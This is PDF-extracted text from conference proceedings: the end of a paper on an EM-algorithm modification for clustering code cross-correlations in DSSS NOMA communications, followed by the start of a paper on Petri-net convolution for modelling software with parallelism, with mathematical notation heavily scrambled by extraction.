cross-correlation coefficient, and this fact is possible to determine by means of a simple analysis of r. In order to analyze the structure of different sets of cross-correlations between code structures, it is advisable to suggest that a cluster contains at least two elements, therefore in the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model the initial structural parameter Kmax = D/2 is chosen. 2.2 Justification of the Initial Model Parameters It is expedient to choose an initial approximation in such a way as to ensure the maximum possible equidistance between Gaussian components in the range of all possible values of a cross-correlation coefficient in the general case, i.e. −1 ≤ r˜ ≤ 1. This will ensure that the initial clusters cover uniformly the range of all possible values of r˜ during the analysis. A position of the initial clusters will be defined by μ0 , which can be expressed from the condition of the maximum possible equidistance between K clusters: 0
μk = −1 + kμ −
μ , k = 1, K, 2
(8)
where μ = (max r˜ − min r˜ )/K = 2/K. The width of an initial cluster can be defined using the 3σ rule, accordingto which 0 0 0 0 each initial cluster is characterized by the interval μk − 3σk ; μk + 3σk .
Machine Learning Technique Based on Gaussian Mixture Model
19
Given the condition of the maximum possible equidistance between K clusters and 0 the 3σ rule for the width of an initial cluster, the value of σk can be expressed as follows: 0
σk =
max r˜ − min r˜ 1 = , k = 1, K. 6K 3K
(9)
In the conditions of a priori uncertainty about a distribution of elements on initial clusters, it is reasonable to assume that these elements are distributed uniformly among K clusters: 0
θk =
1 , k = 1, K. K
(10)
The EM-algorithm will refine the initial model parameters ω0 = θ0 , μ0 , σ0 s that each new s-th iteration allows obtaining a new refined approximation ω = so s s s r than approximations θ , μ , σ , which is more likely for the observed data obtained in previous iterations (the log-likelihood function L(ω| r) will be increasing at each iteration). 2.3 Introducing and Justification of Additional Clustering Criteria Let us introduce and justify three additional clustering criteria for adjusting the procedures of EM-algorithm under conditions of mathematical singularities (indeterminate forms) in the log-likelihood function L(ω| r), as well as taking into account the peculiarities of the context of element clustering during a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications. 2.3.1 Criterion 1 The k-th cluster (Gaussian component) is empty (does not contain elements) and must be removed in further analysis when the s-th iteration of the EM-algorithm simultaneously meets the following conditions that are interconnected through a posteriori probabilities s−1 s−1 γj,k , j = 1, D, (γj,k → 0 if the following stringent conditions are met): s−1
s−1
1 (stringent condition: Dk = 0) is also a defining condition. 1. Dk s s 2. σk ≈ 0 (stringent condition: σk = 0). s s 3. θk 1/K (stringent condition θk = 0). Note that in the practical implementation of the EM-algorithm, the stringent conditions of the criterion 1 may not be achieved due to the fact that the estimated a posteriori s−1 probabilities γj,k , j = 1, D, for the k-th cluster, which does not contain elements, are s−1
not always γj,k
= 0, j = 1, D, and can be close to these values with an acceptable for s−1
the decision making according to the criterion 1 estimates, i.e. γj,k
≈ 0, j = 1, D.
20
O. Holubnychyi et al.
2.3.2 Criterion 2 The k-th cluster (Gaussian component) contains only one element and must be removed in further analysis because this one selected element (cross-correlation coefficient) in the cluster is trivial (it is known a priori that any two different code structures are correlated with each other in some way, see also the justification of the structural parameter K above), when the s-th iteration of the EM-algorithm simultaneously meets the following conditions: s−1
s−1
≈ 1 (stringent condition: Dk = 1) is also a defining condition. 1. Dk s s 2. σk ≈ 0 (stringent condition: σk = 0). An element that is selected according to the criterion 2 remains in the input data r for a further analysis (further analysis takes place without the removed k-th cluster). 2.3.3 Criterion 3 The k-th cluster (Gaussian component) contains a number of identical elements when the s-th iteration of the EM-algorithm simultaneously meets the following conditions: s−1
s−1
> 1 (stringent condition: Dk 1. Dk condition. s s 2. σk ≈ 0 (stringent condition: σk = 0).
s−1
> 1, Dk
∈ Z+ ) is also a defining
Code structures, involved in the formation of elements that are selected according to the criterion 3, are removed. Further analysis is performed for the input data r that do not contain removed code structures. 2.4 Analysis of Problems that are Associated with Introduced Criteria The introducing of criteria 1–3 is related to the fact that for a certain k-th cluster is s performed σk = 0 under the stringent conditions considered above, which introduces the into mathematical singularities (indeterminate forms) of the type
EM-algorithm r = 0/0 that follows from the analysis of (1) and (4). The introduced criteria L ωs | allow to process the specific mathematical singularity in the EM-algorithm and to continue further statistical analysis with clustering of elements. The introduced criteria also explain the conditions that accompany the entry of the EM-algorithm into the specific mathematical singularity in the context of the problem of a deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications. Let us prove two lemmas to justify criteria 1–3 from the standpoint of analysis of the r = 0/0 in formed mathematical singularities (indeterminate forms) of the type L ωs | the EM-algorithm. 2.4.1 A Lemma on the Mathematical Singularity in the EM-Algorithm that Occurs When the Stringent Conditions of the Criterion 1 Exist, and Its Context Statement of the Lemma. Under the stringent conditions of the criterion 1 at the s-th iteration of the EM-algorithm, the mathematical singularity (indeterminate form) of the
Machine Learning Technique Based on Gaussian Mixture Model
21
type L ωs | r = 0/0 can be processed in such a way that the value of the log-likelihood
s function L ω | r equals to the value, which would be without an empty k-th cluster.
r = 0/0 Proof of the Lemma. Let us analyze the indeterminate form of the type L ωs | for the general case of formation of the k-th empty cluster at the s-th iteration, i.e. at s−1 γj,k → 0, j = 1, D, representing ωs through γs−1 using (7):
lim → 0, j = 1, D
s−1 γj,k
≡
L ωs | r =
lim s−1 γj,k → 0, j = 1, D
lim → 0, j = 1, D
s−1 γj,k
D j=1
ln
K
D j=1
⎧ ⎪ ⎪ ⎨
ln
K k=1
s θk
⎡
⎤
s 2 r˜j − μk ⎥ 2 ⎦ s
⎢ 2 exp⎣− s 2 σk 2π σk
D
s−1 3/2 p=1 γp,k
2 ⎩ D 2π D γs−1 r˜p − μs p=1 p,k k
k=1 ⎪ ⎪
(11)
⎤⎫ s 2 D s−1 ⎪ ⎬ r˜j − μk p=1 γp,k ⎢ ⎥ . × exp⎣− ⎦ s−1 s 2 ⎪ ⎭ r ˜ 2 D γ − μ p p=1 p,k k ⎡
A limit for the term in (11) in a generalized form: ⎧ ⎪ s−1 3/2 D ⎪ ⎨ γ p=1 p,k Aj,k = lim 2 ⎪ s−1 γj,k → 0, ⎪ ⎩ D 2π D γs−1 r˜p − μs p=1 p,k k j = 1, D ⎤⎫ ⎡ s 2 D s−1 ⎪ ⎬ r˜j − μk γ p=1 p,k ⎥ ⎢ × exp⎣− . ⎦ s−1 s 2 ⎪ ⎭ r ˜ 2 D γ − μ p p=1 p,k k For convenience, the logarithm and the property of limit of a continuous function can be used:
Aj,k = exp lnAj,k ⎧ ⎪ ⎪ ⎪ ⎪ ⎪ ⎨
⎛
s−1 3/2 D ⎜ p=1 γp,k lim = exp ln⎜ ⎝ ⎪ s−1 ⎪ s−1 s 2 D γ → 0, ⎪ j,k ⎪ r ˜ D γ − μ 2π p ⎪ p=1 p,k k ⎩ j = 1, D ⎤⎞⎫ ⎡ s 2 D s−1 ⎪ ⎬ r˜j − μk γp,k p=1 ⎥⎟ ⎢ × exp⎣− ⎠ ⎦ 2 ⎪ s−1 s ⎭ r˜p − μk 2 D p=1 γp,k
22
O. Holubnychyi et al.
⎧ ⎪ ⎪ ⎪ ⎪ ⎪ ⎨
⎛
s−1 3/2 D ⎜ γp,k p=1 ⎜ lim = exp ⎜ln ( )1/2 ⎪ s−1 ⎝ D ⎪ s−1 s 2 γ → 0, ⎪ j,k ⎪ r˜p − μk ⎪ p=1 γp,k ⎩ j = 1, D ⎞⎫ s 2 D s−1 ⎪ ⎬ r˜j − μk p=1 γp,k 1 ⎟ . −lnD − ln(2π) − ⎠ 2 s−1 s 2 ⎪ ⎭ r ˜ 2 D γ − μ p p=1 p,k k D
For
s−1 3/2 p=1 γp,k
lim ( )1/2 the L’Hôpital’s rule can be used, taking D s−1 s−1 s 2 r˜p −μk γj,k → 0, p=1 γp,k j = 1, D s
into account that for the k-th empty cluster r˜j − μk = 0, j = 1, D: D
s−1 3/2 p=1 γp,k
lim ( )1/2 s−1 γj,k → 0, D γs−1 r˜ − μs 2 p p=1 p,k k j = 1, D * + D s−1 3/2 ∂ s−1 p=1 γp,k ∂γ ,(j,k = lim )1/2 s−1 D s−1 s 2 γj,k → 0, ∂ r˜p − μk s−1 p=1 γp,k j = 1, D ∂γj,k s−1 1/2 3 D γ p=1 p,k 2 = lim 2 ( )−1/2 s−1 s−1 s 2 D γj,k → 0, 1 r˜ − μs r ˜ γ − μ p p=1 p,k k k 2 j j = 1, D ( )1/2 s−1 1/2 D s−1 s 2 D 3 r˜p − μk p=1 γp,k p=1 γp,k = lim = 0. s−1 s 2 γj,k → 0, r˜j − μk j = 1, D For
lim s−1 γj,k → 0, j = 1, D
s 2 D s−1 r˜j −μk p=1 γp,k s−1 s 2 2 D r˜p −μk p=1 γp,k
the L’Hôpital’s rule can also be used
s 2 D s−1 r˜j − μk p=1 γp,k lim s−1 s−1 s 2 γj,k → 0, 2 D r˜p − μk p=1 γp,k j = 1, D
Machine Learning Technique Based on Gaussian Mixture Model
23
* + s 2 D s−1 s 2 r˜j − μk s−1 p=1 γp,k r˜j − μk ∂γj,k 1 * = lim 2 = . 2 + = s−1 2 s s−1 s ∂ γj,k → 0, s−1 2 r˜j − μk 2 D r˜p − μk p=1 γp,k ∂γj,k j = 1, D ∂
Given this
⎛
⎜ ⎜ lim ⎜ln ( s−1 ⎝ D → 0, γ j,k
j = 1, D
s 2 D s−1 r˜j − μk p=1 γp,k − )1/2 s−1 s 2 s−1 s 2 r˜p − μk 2 D p=1 γp,k r˜p − μ γ s−1 3/2 D γ p=1 p,k
p=1 p,k
k
) 1 −lnD − ln(2π) = −∞. 2
Taking this into account, Aj,k = exp lnAj,k = exp(−∞) = 0, j = 1, D, for some k-th empty cluster. Thus, a formation of empty and the related mathematical
clusters r = 0/0 may be possible during singularity (indeterminate form) of the type L ωs | a deep statistical analysis of cross-correlations between code structures, when using the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model. This indeterminate form can be processed in such a way that for some k-th empty cluster, which is identified s s using the criterion 1, a related k-th degenerate (σk → 0, θk → 0) component of the Gaussian mixture model at the s-th iteration of the EM-algorithm must be removed
from r the structure of the log-likelihood function L(ω| r). In doing so, the value of L ωs | equals to the value, which would be without an empty k-th cluster (Gaussian component in the mixture) due to the fact that for this cluster Aj,k = 0, j = 1, D. 2.4.2 A Lemma on the Mathematical Singularity in the EM-Algorithm that Occurs When the Stringent Conditions of Criteria 2 or 3 Exist, and Its Context Statement of the Lemma. Under the stringent conditions of criteria
2 or 3 at the s-th iteration of the EM-algorithm, the indeterminate form of the type L ωs | r == 0/0 can
be processed in such a way that L ωs | r → ∞, and a related k-th cluster contains only one element or several elements, which are the same. Proof of the Lemma. Suppose that the k-th degenerate component N (˜r ; μk , 0) of the Gaussian mixture model is identified, and it contains only one element (in the case of the criterion 2) or several elements, which are the same (in the case of the criterion 3), from the input data r. Then these elements are . equal to/their mean value μk , and the 2
k) will degenerate into the Dirac probability density function p(˜r ) = √1 exp − (˜r −μ 2σk2 σk 2π
2 delta function p r˜ |σk → 0 = δ(˜r − μk ) in this case. Such unbounded δ(˜r − μk ) is a part of L(ω| r) as a degenerate k-th Gaussian component. Inserting the values (or one
r leads to L ωs | r → ∞. value) r˜j = μk , which belong to the k-th cluster, in L ωs |
24
O. Holubnychyi et al.
Thus, a formation of clusters that contain only one element or several elements, which are
the same, and the related mathematical singularities (indeterminate forms) in L ωs | r may be possible during a deep statistical analysis of cross-correlations between code structures, when using the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model. These indeterminate forms can be processed in such a way that for some k-th cluster, which is s identified using criteria 2 or 3, a related k-th degenerate (σk → 0) component of the Gaussian mixture model at the s-th iteration of the EM-algorithm must be removed from the structure of the log-likelihood function L(ω| r). In doing so, the k-th cluster contains elements, which are related to a set of code structures which are equally correlated with each other.
3 Experiments Let us consider an example of deep statistical analysis of cross-correlations between code structures using the proposed modification of EM-algorithm with removing components of Gaussian mixture model and additional clustering criteria. Let codes for DSSS NOMA communication system be presented by matrix S: ⎛ ⎞ +1 +1 +1 +1 +1 +1 +1 +1 ⎜ +1 −1 +1 −1 −1 −1 +1 −1 ⎟ ⎜ ⎟ ⎜ +1 +1 −1 −1 +1 −1 −1 −1 ⎟ ⎜ ⎟ ⎜ ⎟ ⎜ +1 −1 −1 +1 +1 −1 −1 +1 ⎟ S=⎜ ⎟, ⎜ +1 +1 +1 +1 −1 +1 +1 +1 ⎟ ⎜ ⎟ ⎜ +1 −1 +1 −1 −1 +1 −1 +1 ⎟ ⎜ ⎟ ⎝ +1 +1 −1 −1 −1 −1 +1 +1 ⎠ +1 +1 −1 +1 +1 +1 +1 +1 where each code is Sm,i , m = 1, Q, i = 1, N , N is the code length. Note that in the example Q = 8 and N = 8, however in low power environment friendly DSSS NOMA communications N 1 and typically N > Q. The correlation matrix for codes contains cross-correlation coefficients Rm,n == 1 N i=1 Sm,i Sn,i , m = 1, Q, n = 1, Q. For the considered codes S the correlation matrix N R is presented in (12). In the considered example R contains some limited set of values R ∈ 0, ± 41 , ± 21 , 43 (and trivial Rm,m = 1, m = 1, Q, which matches to the main diagonal of the correlation matrix), and in low power DSSS NOMA communications this set can be much more diverse, especially at Q 1. A mixture of estimated unique and informative cross-correlations (below the main diagonal of the correlation matrix) r = r˜j , j = 1, D, D = 28: r = R2,1 R3,1 R3,2 R4,1 R4,2 R4,3 R5,1 R5,2 R5,3 R5,4 R6,1 R6,2 R6,3 R6,4
Machine Learning Technique Based on Gaussian Mixture Model
25
R6,5 R7,1 R7,2 R7,3 R7,4 R7,5 R7,6 R8,1 R8,2 R8,3 R8,4 R8,5 R8,6 R8,7 = − 41 , − 41 , 0, 0, − 41 , + 41 , 43 , 0, − 21 , − 41 , 0, + 41 , − 41 , 0, + 41 , 0, + 41 , + 41 , 0, + 41 , 0, + 43 , − 21 , 0, + 41 , + 21 , − 41 , + 41 ⎛ ⎜ ⎜ ⎜ ⎜ ⎜ ⎜ R=⎜ ⎜ ⎜ ⎜ ⎜ ⎝
+1 − 41 − 41 +1 − 41 0 0 − 41 + 43 0 0 + 41 0 + 41 + 43 − 21
− 41 0 0 − 41 +1 + 41 + 41 +1 − 21 − 41 − 41 0 + 41 0 0 + 41
+ 43 0 0 + 41 − 21 − 41 − 41 0 +1 + 41 + 41 +1 + 41 0 + 21 − 41
.
3 4 1 1 +4 −2 + 41 0 0 + 41 + 41 + 21 0 − 41 +1 + 41 + 41 +1
0
⎞ ⎟ ⎟ ⎟ ⎟ ⎟ ⎟ ⎟. ⎟ ⎟ ⎟ ⎟ ⎠
(12)
4 Results Simulation results, which have been obtained using the proposed modification of EMalgorithm, are presented below. 1. The initial number of clusters (initial structural parameter of a model) K = D/2 = 14. 2. The initial model parameters ω0 = θ0 , μ0 , σ0 obtained using (8)–(10): 0
0
0
μk = (−15 + 2k)/14, σk = 1/42, θk = 1/14, k = 1, 2, . . . 14. 3. Iteration s = 1. The E-step. L ω0 | r = −47.229. D0 = 0, 0, 3 · 10−8 , 2, 7.4 · 10−4 , 6, 4.5, + 4.5, 8, 9.9 · 10−4 , 1, 2.5 · 10−4 , 2, 3.8 · 10−12 .
26
O. Holubnychyi et al.
4. Iteration s = 1. The M-step. θ1 = 0, 0, 1.09 · 10−9 , 0.07, 2.64 · 10−5 , 0.21, 0.16, 0.16, 0.29, 3.53 · 10−5 , 0.04, 8.81 · 10−6 , 0.07, 1.34 · 10−13 . μ1 = −0.5, −0.5, −0.5, −0.5, −0.25, −0.25, −6.3 · 10−13 , 8.4 · 10−13 , 0.25, 0.25, 0.5, 0.75, 0.75, 0.75 . σ1 = 0, 0, 0, 8.1 · 10−13 , 1.6 · 10−3 , 3.3 · 10−9 , 4 · 10−7 , 4.6 · 10−7 , 2.9 · 10−9 , 9.8 · 10−4 , 1.5 · 10−12 , 2 · 10−3 , 0, 0 . 5. Iteration s = 2. The E-step. L ω1 | r = 531.91. D1 = 0, 3.4 · 10−10 , 2, 2.7 · 10−6 , 1.5 · 10−9 , 6, 4.8, 4.2, 8, 2.9 · 10−9 , 1, 0, 4.9 · 10−3 , 2 . 6. Iteration s = 2. The M-step. θ2 = 0, 1.2 · 10−11 , 0.07, 9.8 · 10−8 , 5.4 · 10−11 , 0.21, 0.17, 0.15, 0.29, 10−10 , 0.04, 0, 1.8 · 10−4 , 0.07 . μ2 = (−0.5, −0.5, −0.5, −0.5, −0.25, −0.25, 0, 0, 0.25, 0.25, 0.5, 0.75, 0.75, 0.75). σ2 = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0). 7. Iteration s = 3. The E-step. The log-likelihood function L(ω| r) cannot be calculated at ω2 due to the formed mathematical singularity (typically identified during calculations as “division by zero”). As will be seen below, this singularity is complex and simultaneously meets all the criteria 1, 2, and 3.
Machine Learning Technique Based on Gaussian Mixture Model
27
5 Discussion An analysis of obtained results is presented below. 1. Clusters k = 1, k = 12 meet the criterion 1. They are empty (do not contain elements) and must be removed in further analysis. Note that clusters k = 2, k = 4, k = 5, k = 10, and k = 13 are also close to conditions of the criterion 1, but only clusters k = 1, k = 12 meet the stringent conditions. In this case calculated posterior probabilities 1 1 γj,1 = 0 and γj,12 = 0, j = 1, D, D = 28. 2. Cluster k = 11 meets the criterion 2. It contains only one element and must be removed in further analysis because this one selected element r˜26 = R8,5 in the cluster 1 is trivial (it has been identified using posterior probabilities γ1 , where γ26,11 = 1). r for a further analysis (it will take place The element r˜26 remains in the input data without the removed cluster k = 11), if required. 3. Clusters k = 3, k = 6, and k = 9 meet the criterion 3. Cluster k = 3 contains elements r˜9 = R5,3 and r˜23 = R8,2 . They have been identified using posterior probabilities γ1 , 1 1 where γ9,3 = 1 and γ23,3 = 1. Cluster k = 6 contains elements r˜1 = R2,1 , r˜2 = R3,1 , r˜5 = R4,2 , r˜10 = R5,4 , r˜13 = R6,3 , and r˜27 = R8,6 . They have been identified using 1 1 1 1 1 posterior probabilities γ1 , where γ1,6 = 1, γ2,6 = 1, γ5,6 = 1, γ10,6 = 1, γ13,6 = 1, 1
and γ27,6 = 1. Cluster k = 9 contains elements r˜6 = R4,3 , r˜12 = R6,2 , r˜15 = R6,5 , r˜17 = R7,2 , r˜18 = R7,3 , r˜20 = R7,5 , r˜25 = R8,4 , r˜28 = R8,7 . They have been identified 1 1 1 1 using posterior probabilities γ1 , where γ6,9 = 1, γ12,9 = 1, γ15,9 = 1, γ17,9 = 1, 1
1
1
1
γ18,9 = 1, γ20,9 = 1, γ25,9 = 1, γ28,9 = 1. The practical significance of the results, which have been obtained using the modification of EM-algorithm, boils down to a robust unsupervised clustering of code structures using their cross-correlations for low power environment friendly DSSS NOMA communications. During a clustering due to the introduced criteria have been found automatically clusters, which match to the cross-correlation R = −1/2 (cluster k = 3), R = −1/4 (cluster k = 6), R = 1/4 (cluster k = 9), and R = 1/2 (cluster k = 11). This part of clustering is characterized by obtaining the robust clustering results, because in conditions of a priori uncertainty about the initial model parameters ω0 have been identified with the related posterior probabilities γ1 = 1 all elements r˜ , which match cross-correlations R = −1/2, R = −1/4, R = 1/4, and R = 1/2. A further analysis of clusters using D1 , ω2 , and γ1 shows that in clusters k = 7 and k = 8 can be easily identified all elements r˜ , which match cross-correlations R = 0, i.e. elements r˜3 = R3,2 , r˜4 = R4,1 , r˜8 = R5,2 , r˜11 = R6,1 , r˜14 = R6,4 , r˜16 = R7,1 , r˜19 = R7,4 , r˜21 = R7,6 , and r˜24 = R8,3 . In the same way, the analysis of clusters using D1 , ω2 , and γ1 shows that in clusters k = 13 and k = 14 can be easily identified all elements r˜ , which match cross-correlations R = 3/4, i.e. elements r˜7 = R5,1 and r˜22 = R8,1 . The rest of the clusters, i.e. clusters k = 2, k = 4, k = 5 and k = 10, can be taken for empty, because the related values D1 1 for them (D1 ≤ 2.7 · 10−6 ). Thus, all elements r have been clustered correctly according to the data of the input r. set of values R ∈ 0, ± 41 , ± 21 , 43 , which characterizes the input data
28
O. Holubnychyi et al.
Such clustering can be used to organize and control the processes at the physical layer of low power environment friendly DSSS NOMA communications.
6 Conclusions The machine learning technique based on the Gaussian mixture model for environment friendly communications is proposed in the paper. The proposed technique uses the developed parametric and criteria features modification of the EM-algorithm with removing components of the Gaussian mixture model and introduced additional clustering criteria for a deep statistical analysis of cross-correlations between code structures, which focuses on applications that are related with low power environment friendly DSSS NOMA communications. The introducing and justification of additional clustering criteria in the EM-algorithm are closely related to its features (sensitivity to initial parameters, a priori uncertainty about the number of components of the described model, the need to take into account the specific nature of the problem, possible occurrence of mathematical singularities and indeterminate forms during iterative procedures of the EM-algorithm), which have been analyzed in detail in the paper. The content of the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model contains the justification of the structural model parameter, which is an initial number of components of a mixture, the initial model parameters, and three additional clustering criteria for adjusting the procedures of EM-algorithm under conditions of mathematical singularities in the log-likelihood function that is used in the EM-algorithm (two lemmas are proved in the paper for the justification of these criteria). The example of working of the proposed technique is presented and analyzed. It is shown that the practical significance of the proposed machine learning technique boils down to a robust unsupervised clustering of code structures using their cross-correlations, which can be used to organize and control the processes at the physical layer of low power environment friendly DSSS NOMA communications. The prospect for further research is the development of modification of the random forest machine learning algorithm for environment friendly communications.
References 1. Balusamy, B., Abirami, R.N., Kadry, S., Gandomi, A.H.: Cluster analysis. In: Big Data: Concepts, Technology, and Architecture. Wiley, Hoboken (2021) 2. Zhu, J., et al.: ECRKQ: machine learning-based energy-efficient clustering and cooperative routing for mobile underwater acoustic sensor networks. IEEE Access 9, 70843–70855 (2021). https://doi.org/10.1109/ACCESS.2021.3078174 3. Alekseeva, D., et al.: Comparison of machine learning techniques applied to traffic prediction of real wireless network. IEEE Access 9, 159495–159514 (2021). https://doi.org/10.1109/ ACCESS.2021.3129850 4. Xu, Q., et al.: Roadside estimation of a vehicle’s center of gravity height based on an improved single-stage detection algorithm and regression prediction technology. IEEE Sens. J. 21(21), 24520–24530 (2021). https://doi.org/10.1109/JSEN.2021.3114703
Machine Learning Technique Based on Gaussian Mixture Model
29
5. Jang, K.J., et al.: Rain attenuation prediction model for terrestrial links using Gaussian process regression. IEEE Commun. Lett. 25(11), 3719–3723 (2021). https://doi.org/10.1109/ LCOMM.2021.3109619 6. Agbinya, J.I.: Hidden Markov Modelling (HMM). In: Applied Data Analytics – Principles and Applications. River Publishers, Gistrup (2020) 7. Piho, L., Kruusmaa, M.: Subsurface flow path modeling from inertial measurement unit sensor data using infinite hidden Markov models. IEEE Sens. J. 22(1), 621–630 (2022). https://doi. org/10.1109/JSEN.2021.3128838 8. Liu, C., Song, W., Lu, C., Xia, J.: Spatial-temporal hidden Markov model for land cover classification using multitemporal satellite images. IEEE Access 9, 76493–76502 (2021). https://doi.org/10.1109/ACCESS.2021.3080926 9. Sustainable Development Goals | United Nations Development Programme (2021). https:// www.undp.org/sustainable-development-goals 10. Micheletti, J.A., Godoy, E.P.: Improved indoor 3D localization using LoRa wireless communication. IEEE Lat. Am. Trans. 20(3), 481–487 (2022). https://doi.org/10.1109/TLA.2022. 9667147 11. Chew, D., Adams, A.L., Uher, J.: Intelligent radio concepts. In: Wireless Coexistence: Standards, Challenges, and Intelligent Solutions. Wiley, Hoboken (2021) 12. Middlestead, R.W.: Spread-spectrum communications. In: Digital Communications with Emphasis on Data Modems: Theory, Analysis, Design, Simulation, Testing, and Applications. Wiley, Hoboken (2017) 13. Kopta, V., Enz, C.: Ultra-Low Power FM-UWB Transceivers for IoT. River Publishers, Gistrup (2019) 14. Zhong, R., et al.: AI empowered RIS-assisted NOMA networks: deep learning or reinforcement learning? IEEE J. Sel. Areas Commun. 40(1), 182–196 (2022). https://doi.org/10.1109/ JSAC.2021.3126068 15. Holubnychyi, A.H., Konakhovych, G.F.: Multiplicative complementary binary signal-code constructions. Radioelectron. Commun. Syst. 61(10), 431–443 (2018). https://doi.org/10. 3103/S0735272718100011 16. Holubnychyi, A.G., Konakhovych, G.F., Taranenko, A.G., Gabrousenko, Ye.I.: Comparison of additive and multiplicative complementary sequences for navigation and flight control systems. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kiev, Ukraine, pp. 24–27 (2018). https://doi.org/10.1109/ MSNMC.2018.8576275 17. Holubnychyi, A.G., Konakhovych, G.F., Odarchenko, R.S.: Signal constructions with low resultant sidelobes for pulse compression navigation and radar systems. In: IEEE 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), Kiev, Ukraine, pp. 267–270 (2016). https://doi.org/10.1109/MSNMC.2016.7783158 18. Yu, D., Deng, L.: Gaussian mixture models. In: Yu, D., Deng, L. (eds.) Automatic Speech Recognition. Signals and Communication Technology, pp. 13–21. Springer, London (2015). https://doi.org/10.1007/978-1-4471-5779-3_2 19. Huang, T., Peng, H., Zhang, K.: Model selection for Gaussian mixture models. Stat. Sin. 27, 147–169 (2017). https://doi.org/10.5705/ss.2014.105 20. Dempster, A.P., Laird, N.M., Rubin, D.B.: Maximum likelihood from incomplete data via the EM algorithm. J. R. Stat. Soc. Ser. B 39(1), 1–38 (1977) 21. Gupta, M.R.: Theory and use of the EM algorithm. Found. Trends® Signal Process. 4(3), 223–296 (2010). https://doi.org/10.1561/2000000034 22. Vlassis, N., Likas, A.: A greedy EM algorithm for Gaussian mixture learning. Neural Process. Lett. 15, 77–87 (2002). https://doi.org/10.1023/A:1013844811137
Applying a Combined Approach to Modeling of Software Functioning Oksana Suprunenko(B) , Borys Onyshchenko, Julia Grebenovych, and Petro Nedonosko The Bohdan Khmelnytsky National University of Cherkasy, Cherkasy, Ukraine [email protected]
Abstract. The purpose is to research the effectiveness of using a combined approach to simulation modeling software. The tasks of the work are: development of a convolution method that reduces the dimension of the model without losing elements of parallel and concurrent processes; constructing of an simulation model of software with parallelism for analysis of its dynamic properties and formation of design solutions without functional disadvantages. The object of research is the Petri nets base simulation model of the software with parallelism. The subject of research is the functional disadvantages of simulation models with parallelism and ways to correct them. The results of research are: the convolution method and the example of its use in the analysis of dynamic properties of models with parallelism; testing the methodology for detecting and correction functional disadvantages in reduced simulation models of software components. Keywords: Petri nets · simulation model of the software component with parallelism · convolution method · combined approach to simulation of systems with parallelism
1 Introduction The software system is a set of related components that interact for achieving the set goals [1] and are characterized by structural features, determined by functionality and information complexity. The most important and complex in its modeling is the description and analysis of parallel and concurrent processes interaction [2] at the intra-component and inter-component levels, which is necessary to estimate the working capacity and reliability of the system. Technologies of simulation modeling have proven to be the most effective for modeling the dynamic aspects of systems with parallelism [3, 4]. The ones of the most effective are simulation models based on Petri nets (PNs) [5]. When analyzing the PNs, such characteristics of software systems as liveliness and reachability [6], repeatability, preservation and controllability [7] are determined, which is important to ensure the intended functioning of the software, as well as to reduce the cost of development and support of software systems. Limited Petri nets (finite-capacity nets) are used to build simulation models to solve applied problems. Currently, the solutions to the problems of the analysis of component © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 30–48, 2023. https://doi.org/10.1007/978-3-031-35467-0_3
Applying a Combined Approach to Modeling of Software Functioning
31
PNs [8], nested PNs [9] and other Petri nets [5], which are associated to hierarchical Petri nets [10], are being investigated. For estimation of Petri nets, the analysis tasks are solvable [11]. Such interpretation of PNs is used in this paper to describe models of software systems for their simulation modeling and analytical researches [2]. In addition, it is used in combination with hierarchical PNs for block modeling [12], because Petri nets are closure with respect to finite substitution [10]. This allows them to be used for modeling large and complex systems, as it involves a step-by-step analysis of their components [13]. Applied aspects of the use of a combined approach to imitation modeling of systems with parallelism are considered. In particular, it is proposed to solve the problem of rapid increase in dimension when collecting a software model from its components. This is necessary for dynamic analysis of PN models, in which a significant limiting factor is the dimension of the model. Significant increase in the dimension of the model when applying the method of invariants [7] brings to an exponential increase in time calculation of the minimum set of invariants. To solve this problem, a convolution method is proposed, after which only elements with parallelism, concurrent processes and other complex structures associated with parallelism are left in the reduced model. An example of the use of a combined approach to the imitation modeling of microservice of videocalls and analysis of its dynamic properties is given. The purpose of the paper is to investigate the effectiveness of a combined approach to imitation modeling of systems with parallelism on the example of microservice of videocalls. The task of the research is the development of the convolution method to reduce the dimension of the model in the analysis of parallel and concurrent processes or mixed structures (parallel threads, cycles and vertices of control). Other task is the use of a combined approach with the convolution method in the construction of imitation model of the microservice and its analysis, the detection of disadvantages in the functioning of the microservice and verification the decisions to eliminate them.
2 Materials and Methods For dynamic analysis of PN-models, a significant limiting factor is the dimension of the model. Too large increase in the dimension of the model when using the method of invariants [7, 11] leads to an exponential increase in time for calculating invariants. The problem of convoluting related elements of submodels to reduce the dimensionality of a partial model arises, for example, when assembling a software model from subordinate submodels to a partial model, which is gradually transformed into a software system model with parallelism. In the first stage of the analysis, all submodels are analyzed separately, and the influence of inter-component connections and external factors is configurable in the control vectors of the respective vertexes. Upon successful completion of the first stage, debugged submodels are assembled into a model by sequentially connecting submodels to a partial system model. When assembling a model from submodels, the dimension of the partial model is growing fast. For further modelling using automated analysis tools based on matrix description and invariant method, it is necessary to reduce the dimension of models, which is achieved by convoluting sections of the model that do
32
O. Suprunenko et al.
not have critical properties (e.g., automatic coverage of the Petri net [14]). But the possibilities of convolution of submodels are not limited to the task of covering their structure with simpler modifications of Petri nets, for which defencelessness properties have been proven. In the convolution method the rules are formulated according to which the sections of the network are convoluted into the corresponding vertexes of the partial model in order to reduce its dimension. Rule 1. A section of a submodel that has one input and one output vertexes of places and has no connections from internal vertices to other elements of the model is convoluted into one vertex of place. This rule can be applied to sections of two adjacent submodels that corresponds the above constraints. When establishing additional connections with other elements of the model, options for their connection with the convolution vertex through the corresponding transition vertex, for example, through the transition vertex t2 (Fig. 1, b) are considered.
Fig. 1. Example of convolution of weakly connected elements of a submodel
